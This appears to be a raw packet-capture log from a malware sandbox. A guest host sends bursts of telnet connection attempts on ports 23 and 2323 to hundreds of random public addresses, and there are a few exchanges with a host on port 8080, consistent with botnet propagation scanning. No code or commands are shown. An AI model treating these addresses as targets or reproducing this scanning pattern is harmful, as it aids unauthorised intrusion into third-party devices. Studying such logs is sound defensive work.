                                                              Dec 11, 2024 00:43:27.294958115 CET1020023192.168.2.23164.6.205.247
                                                              Dec 11, 2024 00:43:27.294972897 CET1020023192.168.2.23101.69.71.141
                                                              Dec 11, 2024 00:43:27.294976950 CET1020023192.168.2.234.41.71.59
                                                              Dec 11, 2024 00:43:27.294989109 CET1020023192.168.2.23200.203.207.190
                                                              Dec 11, 2024 00:43:27.294990063 CET1020023192.168.2.23103.208.94.209
                                                              Dec 11, 2024 00:43:27.295000076 CET1020023192.168.2.2336.8.75.212
                                                              Dec 11, 2024 00:43:27.295016050 CET102002323192.168.2.2376.31.35.6
                                                              Dec 11, 2024 00:43:27.295017004 CET1020023192.168.2.2312.86.112.240
                                                              Dec 11, 2024 00:43:27.295018911 CET1020023192.168.2.23102.143.216.78
                                                              Dec 11, 2024 00:43:27.295028925 CET1020023192.168.2.23161.116.121.243
                                                              Dec 11, 2024 00:43:27.295036077 CET1020023192.168.2.23161.15.163.22
                                                              Dec 11, 2024 00:43:27.295047998 CET1020023192.168.2.23197.140.155.53
                                                              Dec 11, 2024 00:43:27.295053005 CET1020023192.168.2.2374.137.10.247
                                                              Dec 11, 2024 00:43:27.295056105 CET1020023192.168.2.23149.73.248.234
                                                              Dec 11, 2024 00:43:27.295068026 CET1020023192.168.2.2387.134.148.98
                                                              Dec 11, 2024 00:43:27.295111895 CET1020023192.168.2.2314.245.50.80
                                                              Dec 11, 2024 00:43:27.295113087 CET1020023192.168.2.23101.38.231.106
                                                              Dec 11, 2024 00:43:27.295119047 CET102002323192.168.2.23195.55.243.155
                                                              Dec 11, 2024 00:43:27.295130014 CET1020023192.168.2.23190.137.133.224
                                                              Dec 11, 2024 00:43:27.295130014 CET1020023192.168.2.2318.219.39.133
                                                              Dec 11, 2024 00:43:27.295150995 CET1020023192.168.2.2396.173.232.77
                                                              Dec 11, 2024 00:43:27.295152903 CET1020023192.168.2.2336.152.105.67
                                                              Dec 11, 2024 00:43:27.295152903 CET1020023192.168.2.23115.68.4.164
                                                              Dec 11, 2024 00:43:27.295167923 CET1020023192.168.2.23166.189.148.139
                                                              Dec 11, 2024 00:43:27.295185089 CET1020023192.168.2.23193.16.40.50
                                                              Dec 11, 2024 00:43:27.295187950 CET1020023192.168.2.2364.47.213.213
                                                              Dec 11, 2024 00:43:27.295202017 CET1020023192.168.2.23216.38.50.54
                                                              Dec 11, 2024 00:43:27.295208931 CET102002323192.168.2.23149.34.26.161
                                                              Dec 11, 2024 00:43:27.295214891 CET1020023192.168.2.23116.110.185.49
                                                              Dec 11, 2024 00:43:27.295229912 CET1020023192.168.2.23133.58.28.249
                                                              Dec 11, 2024 00:43:27.295229912 CET1020023192.168.2.2341.136.247.125
                                                              Dec 11, 2024 00:43:27.295248032 CET1020023192.168.2.2378.70.155.42
                                                              Dec 11, 2024 00:43:27.295262098 CET1020023192.168.2.23141.77.91.231
                                                              Dec 11, 2024 00:43:27.295262098 CET1020023192.168.2.23152.129.76.178
                                                              Dec 11, 2024 00:43:27.295279980 CET1020023192.168.2.23188.162.250.80
                                                              Dec 11, 2024 00:43:27.295284986 CET1020023192.168.2.23107.239.31.135
                                                              Dec 11, 2024 00:43:27.295299053 CET1020023192.168.2.23204.175.128.234
                                                              Dec 11, 2024 00:43:27.295306921 CET1020023192.168.2.23125.39.210.55
                                                              Dec 11, 2024 00:43:27.295306921 CET102002323192.168.2.23185.46.47.140
                                                              Dec 11, 2024 00:43:27.295329094 CET1020023192.168.2.23170.26.49.164
                                                              Dec 11, 2024 00:43:27.295329094 CET1020023192.168.2.2384.230.195.44
                                                              Dec 11, 2024 00:43:27.295331955 CET1020023192.168.2.23208.108.91.23
                                                              Dec 11, 2024 00:43:27.295350075 CET1020023192.168.2.2331.55.213.136
                                                              Dec 11, 2024 00:43:27.295352936 CET1020023192.168.2.2359.12.60.206
                                                              Dec 11, 2024 00:43:27.295353889 CET1020023192.168.2.23112.88.62.244
                                                              Dec 11, 2024 00:43:27.295356989 CET1020023192.168.2.238.130.108.96
                                                              Dec 11, 2024 00:43:27.295360088 CET1020023192.168.2.23153.208.56.210
                                                              Dec 11, 2024 00:43:27.295375109 CET102002323192.168.2.2399.201.103.150
                                                              Dec 11, 2024 00:43:27.295376062 CET1020023192.168.2.23106.97.227.32
                                                              Dec 11, 2024 00:43:27.295386076 CET1020023192.168.2.23163.68.171.67
                                                              Dec 11, 2024 00:43:27.295387030 CET1020023192.168.2.2378.37.52.226
                                                              Dec 11, 2024 00:43:27.295406103 CET1020023192.168.2.23187.97.174.181
                                                              Dec 11, 2024 00:43:27.295408010 CET1020023192.168.2.2379.248.182.79
                                                              Dec 11, 2024 00:43:27.295413971 CET1020023192.168.2.2334.125.112.144
                                                              Dec 11, 2024 00:43:27.295414925 CET1020023192.168.2.23201.60.66.34
                                                              Dec 11, 2024 00:43:27.295429945 CET1020023192.168.2.2343.150.12.193
                                                              Dec 11, 2024 00:43:27.295433998 CET1020023192.168.2.2340.20.108.89
                                                              Dec 11, 2024 00:43:27.295450926 CET102002323192.168.2.2380.144.55.234
                                                              Dec 11, 2024 00:43:27.295453072 CET1020023192.168.2.2331.149.175.62
                                                              Dec 11, 2024 00:43:27.295464993 CET1020023192.168.2.23108.33.1.88
                                                              Dec 11, 2024 00:43:27.295469046 CET102001023192.168.2.2338.35.164.197
                                                              Dec 11, 2024 00:43:27.295480013 CET1020023192.168.2.23164.163.40.142
                                                              Dec 11, 2024 00:43:27.295490980 CET1020023192.168.2.23148.41.208.231
                                                              Dec 11, 2024 00:43:27.295499086 CET1020023192.168.2.2377.9.126.35
                                                              Dec 11, 2024 00:43:27.295501947 CET1020023192.168.2.2375.216.45.34
                                                              Dec 11, 2024 00:43:27.295516968 CET1020023192.168.2.23166.68.181.168
                                                              Dec 11, 2024 00:43:27.295517921 CET1020023192.168.2.23206.41.120.106
                                                              Dec 11, 2024 00:43:27.295526981 CET102002323192.168.2.23173.119.190.10
                                                              Dec 11, 2024 00:43:27.295532942 CET1020023192.168.2.23188.10.48.148
                                                              Dec 11, 2024 00:43:27.295547009 CET1020023192.168.2.23223.161.28.83
                                                              Dec 11, 2024 00:43:27.295548916 CET1020023192.168.2.2388.13.130.19
                                                              Dec 11, 2024 00:43:27.295561075 CET1020023192.168.2.2340.210.30.58
                                                              Dec 11, 2024 00:43:27.295576096 CET1020023192.168.2.2388.175.63.158
                                                              Dec 11, 2024 00:43:27.295578003 CET1020023192.168.2.2332.2.138.162
                                                              Dec 11, 2024 00:43:27.295586109 CET1020023192.168.2.23210.132.160.219
                                                              Dec 11, 2024 00:43:27.295587063 CET1020023192.168.2.23107.160.240.219
                                                              Dec 11, 2024 00:43:27.295599937 CET1020023192.168.2.23105.159.15.217
                                                              Dec 11, 2024 00:43:27.295604944 CET102002323192.168.2.23151.4.146.139
                                                              Dec 11, 2024 00:43:27.295612097 CET1020023192.168.2.23184.41.72.152
                                                              Dec 11, 2024 00:43:27.295619965 CET1020023192.168.2.23193.253.219.91
                                                              Dec 11, 2024 00:43:27.295630932 CET1020023192.168.2.23208.230.61.241
                                                              Dec 11, 2024 00:43:27.295634985 CET1020023192.168.2.23219.164.230.207
                                                              Dec 11, 2024 00:43:27.295648098 CET1020023192.168.2.23151.159.106.223
                                                              Dec 11, 2024 00:43:27.295648098 CET1020023192.168.2.2388.75.14.49
                                                              Dec 11, 2024 00:43:27.295660973 CET1020023192.168.2.23190.72.2.132
                                                              Dec 11, 2024 00:43:27.295667887 CET1020023192.168.2.2387.252.57.171
                                                              Dec 11, 2024 00:43:27.295671940 CET1020023192.168.2.2341.85.192.205
                                                              Dec 11, 2024 00:43:27.295681953 CET102002323192.168.2.23165.53.60.48
                                                              Dec 11, 2024 00:43:27.295694113 CET1020023192.168.2.23204.137.87.41
                                                              Dec 11, 2024 00:43:27.295696020 CET1020023192.168.2.2327.202.193.77
                                                              Dec 11, 2024 00:43:27.295706034 CET1020023192.168.2.2381.137.164.41
                                                              Dec 11, 2024 00:43:27.295715094 CET1020023192.168.2.2320.109.86.254
                                                              Dec 11, 2024 00:43:27.295727015 CET1020023192.168.2.2317.1.201.225
                                                              Dec 11, 2024 00:43:27.295738935 CET1020023192.168.2.23145.139.109.118
                                                              Dec 11, 2024 00:43:27.295747995 CET1020023192.168.2.23212.132.164.108
                                                              Dec 11, 2024 00:43:27.295763969 CET1020023192.168.2.23201.109.89.218
                                                              Dec 11, 2024 00:43:27.295768023 CET1020023192.168.2.2336.98.158.86
                                                              Dec 11, 2024 00:43:27.414319038 CET10231020057.91.75.127192.168.2.23
                                                              Dec 11, 2024 00:43:27.414331913 CET231020063.218.134.224192.168.2.23
                                                              Dec 11, 2024 00:43:27.414341927 CET2310200126.67.107.144192.168.2.23
                                                              Dec 11, 2024 00:43:27.414350033 CET2310200199.254.77.241192.168.2.23
                                                              Dec 11, 2024 00:43:27.414354086 CET2310200188.101.128.48192.168.2.23
                                                              Dec 11, 2024 00:43:27.414362907 CET231020058.41.15.237192.168.2.23
                                                              Dec 11, 2024 00:43:27.414382935 CET102001023192.168.2.2357.91.75.127
                                                              Dec 11, 2024 00:43:27.414385080 CET1020023192.168.2.23199.254.77.241
                                                              Dec 11, 2024 00:43:27.414386988 CET1020023192.168.2.2363.218.134.224
                                                              Dec 11, 2024 00:43:27.414386988 CET1020023192.168.2.23126.67.107.144
                                                              Dec 11, 2024 00:43:27.414395094 CET1020023192.168.2.23188.101.128.48
                                                              Dec 11, 2024 00:43:27.414417028 CET1020023192.168.2.2358.41.15.237
                                                              Dec 11, 2024 00:43:27.414442062 CET231020069.227.213.57192.168.2.23
                                                              Dec 11, 2024 00:43:27.414452076 CET231020037.73.159.126192.168.2.23
                                                              Dec 11, 2024 00:43:27.414459944 CET2310200217.186.157.183192.168.2.23
                                                              Dec 11, 2024 00:43:27.414468050 CET23231020089.21.12.67192.168.2.23
                                                              Dec 11, 2024 00:43:27.414472103 CET2310200202.209.39.29192.168.2.23
                                                              Dec 11, 2024 00:43:27.414479017 CET1020023192.168.2.2369.227.213.57
                                                              Dec 11, 2024 00:43:27.414479971 CET1020023192.168.2.2337.73.159.126
                                                              Dec 11, 2024 00:43:27.414480925 CET2310200177.169.132.158192.168.2.23
                                                              Dec 11, 2024 00:43:27.414489985 CET231020042.112.49.206192.168.2.23
                                                              Dec 11, 2024 00:43:27.414499044 CET2310200186.205.141.226192.168.2.23
                                                              Dec 11, 2024 00:43:27.414499044 CET1020023192.168.2.23217.186.157.183
                                                              Dec 11, 2024 00:43:27.414501905 CET1020023192.168.2.23202.209.39.29
                                                              Dec 11, 2024 00:43:27.414505005 CET102002323192.168.2.2389.21.12.67
                                                              Dec 11, 2024 00:43:27.414506912 CET1020023192.168.2.23177.169.132.158
                                                              Dec 11, 2024 00:43:27.414509058 CET231020053.7.38.20192.168.2.23
                                                              Dec 11, 2024 00:43:27.414518118 CET231020017.29.24.23192.168.2.23
                                                              Dec 11, 2024 00:43:27.414520979 CET2310200174.152.66.85192.168.2.23
                                                              Dec 11, 2024 00:43:27.414530039 CET2310200156.38.32.77192.168.2.23
                                                              Dec 11, 2024 00:43:27.414532900 CET1020023192.168.2.2342.112.49.206
                                                              Dec 11, 2024 00:43:27.414540052 CET2310200107.234.50.20192.168.2.23
                                                              Dec 11, 2024 00:43:27.414540052 CET1020023192.168.2.23186.205.141.226
                                                              Dec 11, 2024 00:43:27.414540052 CET1020023192.168.2.23174.152.66.85
                                                              Dec 11, 2024 00:43:27.414541006 CET1020023192.168.2.2317.29.24.23
                                                              Dec 11, 2024 00:43:27.414541006 CET1020023192.168.2.2353.7.38.20
                                                              Dec 11, 2024 00:43:27.414544106 CET231020023.86.4.33192.168.2.23
                                                              Dec 11, 2024 00:43:27.414547920 CET232310200100.59.179.169192.168.2.23
                                                              Dec 11, 2024 00:43:27.414556026 CET2310200158.93.178.163192.168.2.23
                                                              Dec 11, 2024 00:43:27.414563894 CET231020084.94.124.192192.168.2.23
                                                              Dec 11, 2024 00:43:27.414570093 CET1020023192.168.2.23156.38.32.77
                                                              Dec 11, 2024 00:43:27.414577961 CET1020023192.168.2.2323.86.4.33
                                                              Dec 11, 2024 00:43:27.414577961 CET1020023192.168.2.23107.234.50.20
                                                              Dec 11, 2024 00:43:27.414581060 CET102002323192.168.2.23100.59.179.169
                                                              Dec 11, 2024 00:43:27.414583921 CET2310200114.226.103.190192.168.2.23
                                                              Dec 11, 2024 00:43:27.414594889 CET2310200167.45.56.50192.168.2.23
                                                              Dec 11, 2024 00:43:27.414597988 CET1020023192.168.2.23158.93.178.163
                                                              Dec 11, 2024 00:43:27.414602041 CET1020023192.168.2.2384.94.124.192
                                                              Dec 11, 2024 00:43:27.414602995 CET2310200145.133.162.202192.168.2.23
                                                              Dec 11, 2024 00:43:27.414614916 CET1020023192.168.2.23114.226.103.190
                                                              Dec 11, 2024 00:43:27.414629936 CET1020023192.168.2.23167.45.56.50
                                                              Dec 11, 2024 00:43:27.414632082 CET1020023192.168.2.23145.133.162.202
                                                              Dec 11, 2024 00:43:27.414916992 CET231020089.89.119.147192.168.2.23
                                                              Dec 11, 2024 00:43:27.414957047 CET1020023192.168.2.2389.89.119.147
                                                              Dec 11, 2024 00:43:27.414964914 CET2310200197.118.48.220192.168.2.23
                                                              Dec 11, 2024 00:43:27.414974928 CET231020036.249.159.157192.168.2.23
                                                              Dec 11, 2024 00:43:27.415004015 CET1020023192.168.2.2336.249.159.157
                                                              Dec 11, 2024 00:43:27.415005922 CET1020023192.168.2.23197.118.48.220
                                                              Dec 11, 2024 00:43:27.415023088 CET2310200103.228.152.39192.168.2.23
                                                              Dec 11, 2024 00:43:27.415033102 CET232310200103.67.253.30192.168.2.23
                                                              Dec 11, 2024 00:43:27.415040970 CET2310200120.134.212.52192.168.2.23
                                                              Dec 11, 2024 00:43:27.415061951 CET1020023192.168.2.23103.228.152.39
                                                              Dec 11, 2024 00:43:27.415066004 CET102002323192.168.2.23103.67.253.30
                                                              Dec 11, 2024 00:43:27.415075064 CET1020023192.168.2.23120.134.212.52
                                                              Dec 11, 2024 00:43:27.415081978 CET2310200135.206.39.228192.168.2.23
                                                              Dec 11, 2024 00:43:27.415091991 CET2310200114.163.69.139192.168.2.23
                                                              Dec 11, 2024 00:43:27.415122032 CET1020023192.168.2.23114.163.69.139
                                                              Dec 11, 2024 00:43:27.415122986 CET1020023192.168.2.23135.206.39.228
                                                              Dec 11, 2024 00:43:27.415137053 CET2310200128.246.148.190192.168.2.23
                                                              Dec 11, 2024 00:43:27.415147066 CET2310200175.193.161.74192.168.2.23
                                                              Dec 11, 2024 00:43:27.415155888 CET231020089.75.101.4192.168.2.23
                                                              Dec 11, 2024 00:43:27.415163040 CET231020044.69.73.190192.168.2.23
                                                              Dec 11, 2024 00:43:27.415173054 CET2310200123.191.111.50192.168.2.23
                                                              Dec 11, 2024 00:43:27.415175915 CET1020023192.168.2.23128.246.148.190
                                                              Dec 11, 2024 00:43:27.415175915 CET1020023192.168.2.23175.193.161.74
                                                              Dec 11, 2024 00:43:27.415193081 CET1020023192.168.2.2389.75.101.4
                                                              Dec 11, 2024 00:43:27.415193081 CET2310200213.241.128.87192.168.2.23
                                                              Dec 11, 2024 00:43:27.415194035 CET1020023192.168.2.2344.69.73.190
                                                              Dec 11, 2024 00:43:27.415199041 CET1020023192.168.2.23123.191.111.50
                                                              Dec 11, 2024 00:43:27.415232897 CET1020023192.168.2.23213.241.128.87
                                                              Dec 11, 2024 00:43:27.415256977 CET2323102005.16.200.244192.168.2.23
                                                              Dec 11, 2024 00:43:27.415266037 CET2310200165.6.129.162192.168.2.23
                                                              Dec 11, 2024 00:43:27.415273905 CET2310200110.14.91.144192.168.2.23
                                                              Dec 11, 2024 00:43:27.415281057 CET231020093.238.233.50192.168.2.23
                                                              Dec 11, 2024 00:43:27.415297031 CET102002323192.168.2.235.16.200.244
                                                              Dec 11, 2024 00:43:27.415297031 CET1020023192.168.2.23110.14.91.144
                                                              Dec 11, 2024 00:43:27.415297985 CET1020023192.168.2.23165.6.129.162
                                                              Dec 11, 2024 00:43:27.415319920 CET1020023192.168.2.2393.238.233.50
                                                              Dec 11, 2024 00:43:27.415345907 CET2310200223.31.89.153192.168.2.23
                                                              Dec 11, 2024 00:43:27.415354967 CET231020034.237.166.208192.168.2.23
                                                              Dec 11, 2024 00:43:27.415384054 CET1020023192.168.2.23223.31.89.153
                                                              Dec 11, 2024 00:43:27.415396929 CET1020023192.168.2.2334.237.166.208
                                                              Dec 11, 2024 00:43:27.415467024 CET231020097.109.83.168192.168.2.23
                                                              Dec 11, 2024 00:43:27.415476084 CET2310200150.27.237.154192.168.2.23
                                                              Dec 11, 2024 00:43:27.415487051 CET2310200184.138.219.237192.168.2.23
                                                              Dec 11, 2024 00:43:27.415498972 CET2310200152.210.140.75192.168.2.23
                                                              Dec 11, 2024 00:43:27.415507078 CET1020023192.168.2.2397.109.83.168
                                                              Dec 11, 2024 00:43:27.415508032 CET232310200154.148.202.106192.168.2.23
                                                              Dec 11, 2024 00:43:27.415508986 CET1020023192.168.2.23150.27.237.154
                                                              Dec 11, 2024 00:43:27.415517092 CET231020086.163.185.120192.168.2.23
                                                              Dec 11, 2024 00:43:27.415520906 CET2310200183.141.46.111192.168.2.23
                                                              Dec 11, 2024 00:43:27.415524960 CET231020082.172.47.19192.168.2.23
                                                              Dec 11, 2024 00:43:27.415530920 CET1020023192.168.2.23152.210.140.75
                                                              Dec 11, 2024 00:43:27.415533066 CET1020023192.168.2.23184.138.219.237
                                                              Dec 11, 2024 00:43:27.415545940 CET1020023192.168.2.2386.163.185.120
                                                              Dec 11, 2024 00:43:27.415545940 CET102002323192.168.2.23154.148.202.106
                                                              Dec 11, 2024 00:43:27.415555954 CET1020023192.168.2.23183.141.46.111
                                                              Dec 11, 2024 00:43:27.415558100 CET1020023192.168.2.2382.172.47.19
                                                              Dec 11, 2024 00:43:27.415810108 CET231020039.112.156.241192.168.2.23
                                                              Dec 11, 2024 00:43:27.415819883 CET2310200117.73.154.17192.168.2.23
                                                              Dec 11, 2024 00:43:27.415837049 CET2310200160.163.56.146192.168.2.23
                                                              Dec 11, 2024 00:43:27.415844917 CET2310200112.150.22.21192.168.2.23
                                                              Dec 11, 2024 00:43:27.415847063 CET1020023192.168.2.2339.112.156.241
                                                              Dec 11, 2024 00:43:27.415853024 CET1020023192.168.2.23117.73.154.17
                                                              Dec 11, 2024 00:43:27.415853977 CET231020085.255.239.42192.168.2.23
                                                              Dec 11, 2024 00:43:27.415874004 CET1020023192.168.2.23112.150.22.21
                                                              Dec 11, 2024 00:43:27.415874004 CET1020023192.168.2.23160.163.56.146
                                                              Dec 11, 2024 00:43:27.415893078 CET1020023192.168.2.2385.255.239.42
                                                              Dec 11, 2024 00:43:27.415896893 CET231020088.48.123.233192.168.2.23
                                                              Dec 11, 2024 00:43:27.415906906 CET23231020066.120.123.232192.168.2.23
                                                              Dec 11, 2024 00:43:27.415915966 CET231020094.64.217.143192.168.2.23
                                                              Dec 11, 2024 00:43:27.415932894 CET2310200158.48.87.50192.168.2.23
                                                              Dec 11, 2024 00:43:27.415934086 CET1020023192.168.2.2388.48.123.233
                                                              Dec 11, 2024 00:43:27.415941000 CET102002323192.168.2.2366.120.123.232
                                                              Dec 11, 2024 00:43:27.415942907 CET2310200164.6.205.247192.168.2.23
                                                              Dec 11, 2024 00:43:27.415944099 CET1020023192.168.2.2394.64.217.143
                                                              Dec 11, 2024 00:43:27.415956020 CET2310200101.69.71.141192.168.2.23
                                                              Dec 11, 2024 00:43:27.415966988 CET1020023192.168.2.23158.48.87.50
                                                              Dec 11, 2024 00:43:27.415982962 CET1020023192.168.2.23101.69.71.141
                                                              Dec 11, 2024 00:43:27.415983915 CET1020023192.168.2.23164.6.205.247
                                                              Dec 11, 2024 00:43:27.415991068 CET23102004.41.71.59192.168.2.23
                                                              Dec 11, 2024 00:43:27.416024923 CET1020023192.168.2.234.41.71.59
                                                              Dec 11, 2024 00:43:27.416039944 CET2310200103.208.94.209192.168.2.23
                                                              Dec 11, 2024 00:43:27.416049004 CET2310200200.203.207.190192.168.2.23
                                                              Dec 11, 2024 00:43:27.416066885 CET231020036.8.75.212192.168.2.23
                                                              Dec 11, 2024 00:43:27.416078091 CET1020023192.168.2.23103.208.94.209
                                                              Dec 11, 2024 00:43:27.416083097 CET1020023192.168.2.23200.203.207.190
                                                              Dec 11, 2024 00:43:27.416085005 CET23231020076.31.35.6192.168.2.23
                                                              Dec 11, 2024 00:43:27.416105032 CET1020023192.168.2.2336.8.75.212
                                                              Dec 11, 2024 00:43:27.416121006 CET102002323192.168.2.2376.31.35.6
                                                              Dec 11, 2024 00:43:27.416207075 CET231020012.86.112.240192.168.2.23
                                                              Dec 11, 2024 00:43:27.416215897 CET2310200102.143.216.78192.168.2.23
                                                              Dec 11, 2024 00:43:27.416224003 CET2310200161.116.121.243192.168.2.23
                                                              Dec 11, 2024 00:43:27.416232109 CET2310200161.15.163.22192.168.2.23
                                                              Dec 11, 2024 00:43:27.416240931 CET1020023192.168.2.2312.86.112.240
                                                              Dec 11, 2024 00:43:27.416241884 CET2310200197.140.155.53192.168.2.23
                                                              Dec 11, 2024 00:43:27.416245937 CET1020023192.168.2.23102.143.216.78
                                                              Dec 11, 2024 00:43:27.416251898 CET231020074.137.10.247192.168.2.23
                                                              Dec 11, 2024 00:43:27.416254044 CET1020023192.168.2.23161.116.121.243
                                                              Dec 11, 2024 00:43:27.416260958 CET2310200170.26.49.164192.168.2.23
                                                              Dec 11, 2024 00:43:27.416263103 CET1020023192.168.2.23161.15.163.22
                                                              Dec 11, 2024 00:43:27.416275978 CET1020023192.168.2.23197.140.155.53
                                                              Dec 11, 2024 00:43:27.416280985 CET1020023192.168.2.2374.137.10.247
                                                              Dec 11, 2024 00:43:27.416296005 CET1020023192.168.2.23170.26.49.164
                                                              Dec 11, 2024 00:43:27.541636944 CET808038896104.233.49.104192.168.2.23
                                                              Dec 11, 2024 00:43:27.543164968 CET388968080192.168.2.23104.233.49.104
                                                              Dec 11, 2024 00:43:28.035109997 CET4251680192.168.2.23109.202.202.202
                                                              Dec 11, 2024 00:43:28.325824976 CET102001023192.168.2.23179.19.88.56
                                                              Dec 11, 2024 00:43:28.325833082 CET1020023192.168.2.23207.41.13.230
                                                              Dec 11, 2024 00:43:28.325843096 CET1020023192.168.2.23118.152.156.25
                                                              Dec 11, 2024 00:43:28.325845003 CET1020023192.168.2.23166.79.34.252
                                                              Dec 11, 2024 00:43:28.325853109 CET1020023192.168.2.23190.180.67.106
                                                              Dec 11, 2024 00:43:28.325861931 CET1020023192.168.2.2312.57.100.13
                                                              Dec 11, 2024 00:43:28.325871944 CET1020023192.168.2.232.72.48.12
                                                              Dec 11, 2024 00:43:28.325875998 CET1020023192.168.2.2377.225.54.226
                                                              Dec 11, 2024 00:43:28.325881004 CET1020023192.168.2.23124.142.217.246
                                                              Dec 11, 2024 00:43:28.325901985 CET1020023192.168.2.23109.121.248.221
                                                              Dec 11, 2024 00:43:28.325901985 CET102002323192.168.2.23179.40.132.197
                                                              Dec 11, 2024 00:43:28.325917006 CET1020023192.168.2.2376.57.20.186
                                                              Dec 11, 2024 00:43:28.325927973 CET1020023192.168.2.23109.95.10.113
                                                              Dec 11, 2024 00:43:28.325928926 CET1020023192.168.2.23142.187.138.190
                                                              Dec 11, 2024 00:43:28.325948000 CET1020023192.168.2.23166.196.42.137
                                                              Dec 11, 2024 00:43:28.325951099 CET1020023192.168.2.23195.184.242.206
                                                              Dec 11, 2024 00:43:28.325961113 CET1020023192.168.2.23120.4.13.123
                                                              Dec 11, 2024 00:43:28.325967073 CET1020023192.168.2.23179.104.179.55
                                                              Dec 11, 2024 00:43:28.325977087 CET1020023192.168.2.23107.88.165.187
                                                              Dec 11, 2024 00:43:28.325984001 CET1020023192.168.2.2346.226.24.175
                                                              Dec 11, 2024 00:43:28.325995922 CET102002323192.168.2.2320.92.1.18
                                                              Dec 11, 2024 00:43:28.326005936 CET1020023192.168.2.23178.184.16.56
                                                              Dec 11, 2024 00:43:28.326014042 CET1020023192.168.2.23160.167.186.60
                                                              Dec 11, 2024 00:43:28.326014996 CET1020023192.168.2.23221.101.178.92
                                                              Dec 11, 2024 00:43:28.326081038 CET1020023192.168.2.23218.102.1.225
                                                              Dec 11, 2024 00:43:28.326081038 CET1020023192.168.2.234.83.187.94
                                                              Dec 11, 2024 00:43:28.326083899 CET1020023192.168.2.23147.52.66.70
                                                              Dec 11, 2024 00:43:28.326086044 CET1020023192.168.2.23108.249.59.184
                                                              Dec 11, 2024 00:43:28.326086044 CET102002323192.168.2.23160.79.249.23
                                                              Dec 11, 2024 00:43:28.326086044 CET1020023192.168.2.2397.223.142.49
                                                              Dec 11, 2024 00:43:28.326091051 CET1020023192.168.2.23194.18.79.219
                                                              Dec 11, 2024 00:43:28.326107025 CET1020023192.168.2.2366.180.234.9
                                                              Dec 11, 2024 00:43:28.326112032 CET1020023192.168.2.2396.140.91.212
                                                              Dec 11, 2024 00:43:28.326128960 CET1020023192.168.2.23153.103.60.178
                                                              Dec 11, 2024 00:43:28.326131105 CET1020023192.168.2.23148.213.47.73
                                                              Dec 11, 2024 00:43:28.326139927 CET1020023192.168.2.23108.40.143.196
                                                              Dec 11, 2024 00:43:28.326144934 CET1020023192.168.2.231.109.118.115
                                                              Dec 11, 2024 00:43:28.326167107 CET1020023192.168.2.23192.134.232.120
                                                              Dec 11, 2024 00:43:28.326169014 CET1020023192.168.2.2385.141.111.158
                                                              Dec 11, 2024 00:43:28.326181889 CET1020023192.168.2.23189.232.41.96
                                                              Dec 11, 2024 00:43:28.326183081 CET102002323192.168.2.23222.73.65.83
                                                              Dec 11, 2024 00:43:28.326184034 CET1020023192.168.2.2344.108.72.78
                                                              Dec 11, 2024 00:43:28.326205969 CET1020023192.168.2.23213.22.235.121
                                                              Dec 11, 2024 00:43:28.326208115 CET1020023192.168.2.2393.168.67.77
                                                              Dec 11, 2024 00:43:28.326220036 CET1020023192.168.2.23162.51.22.97
                                                              Dec 11, 2024 00:43:28.326221943 CET1020023192.168.2.23141.97.228.56
                                                              Dec 11, 2024 00:43:28.326229095 CET1020023192.168.2.23219.162.238.36
                                                              Dec 11, 2024 00:43:28.326236963 CET1020023192.168.2.23142.117.210.41
                                                              Dec 11, 2024 00:43:28.326248884 CET1020023192.168.2.2366.247.63.61
                                                              Dec 11, 2024 00:43:28.326252937 CET102002323192.168.2.23162.26.98.32
                                                              Dec 11, 2024 00:43:28.326257944 CET1020023192.168.2.23117.69.100.185
                                                              Dec 11, 2024 00:43:28.326272964 CET1020023192.168.2.2399.229.189.114
                                                              Dec 11, 2024 00:43:28.326299906 CET1020023192.168.2.2343.220.36.38
                                                              Dec 11, 2024 00:43:28.326301098 CET1020023192.168.2.2363.90.201.148
                                                              Dec 11, 2024 00:43:28.326304913 CET1020023192.168.2.2335.184.91.221
                                                              Dec 11, 2024 00:43:28.326317072 CET1020023192.168.2.2342.250.173.226
                                                              Dec 11, 2024 00:43:28.326318026 CET1020023192.168.2.2398.60.87.9
                                                              Dec 11, 2024 00:43:28.326334000 CET1020023192.168.2.2317.159.15.240
                                                              Dec 11, 2024 00:43:28.326334953 CET102002323192.168.2.23114.63.153.33
                                                              Dec 11, 2024 00:43:28.326338053 CET1020023192.168.2.2318.203.235.94
                                                              Dec 11, 2024 00:43:28.326353073 CET1020023192.168.2.23141.218.202.214
                                                              Dec 11, 2024 00:43:28.326353073 CET1020023192.168.2.2323.181.227.91
                                                              Dec 11, 2024 00:43:28.326370955 CET1020023192.168.2.2313.81.15.0
                                                              Dec 11, 2024 00:43:28.326373100 CET1020023192.168.2.2323.15.251.2
                                                              Dec 11, 2024 00:43:28.326380968 CET1020023192.168.2.23190.234.218.75
                                                              Dec 11, 2024 00:43:28.326392889 CET1020023192.168.2.23202.231.37.240
                                                              Dec 11, 2024 00:43:28.326395035 CET1020023192.168.2.23149.227.143.103
                                                              Dec 11, 2024 00:43:28.326411009 CET102002323192.168.2.23198.49.217.252
                                                              Dec 11, 2024 00:43:28.326411963 CET1020023192.168.2.2388.84.119.227
                                                              Dec 11, 2024 00:43:28.326411963 CET1020023192.168.2.23108.91.242.148
                                                              Dec 11, 2024 00:43:28.326426983 CET1020023192.168.2.2386.140.86.106
                                                              Dec 11, 2024 00:43:28.326435089 CET1020023192.168.2.23179.81.94.98
                                                              Dec 11, 2024 00:43:28.326442003 CET1020023192.168.2.2336.141.22.171
                                                              Dec 11, 2024 00:43:28.326451063 CET1020023192.168.2.23190.31.90.61
                                                              Dec 11, 2024 00:43:28.326452017 CET1020023192.168.2.23133.232.233.181
                                                              Dec 11, 2024 00:43:28.326467037 CET1020023192.168.2.235.203.194.198
                                                              Dec 11, 2024 00:43:28.326467991 CET1020023192.168.2.2332.215.135.200
                                                              Dec 11, 2024 00:43:28.326483965 CET1020023192.168.2.23121.65.140.135
                                                              Dec 11, 2024 00:43:28.326488972 CET102002323192.168.2.23220.194.53.108
                                                              Dec 11, 2024 00:43:28.326491117 CET1020023192.168.2.23221.228.7.179
                                                              Dec 11, 2024 00:43:28.326505899 CET1020023192.168.2.23168.167.88.200
                                                              Dec 11, 2024 00:43:28.326505899 CET1020023192.168.2.23175.71.152.115
                                                              Dec 11, 2024 00:43:28.326519966 CET1020023192.168.2.23150.189.232.21
                                                              Dec 11, 2024 00:43:28.326523066 CET1020023192.168.2.23183.233.208.0
                                                              Dec 11, 2024 00:43:28.326523066 CET1020023192.168.2.23166.243.182.185
                                                              Dec 11, 2024 00:43:28.326539040 CET1020023192.168.2.23222.13.178.12
                                                              Dec 11, 2024 00:43:28.326539040 CET1020023192.168.2.23173.71.169.24
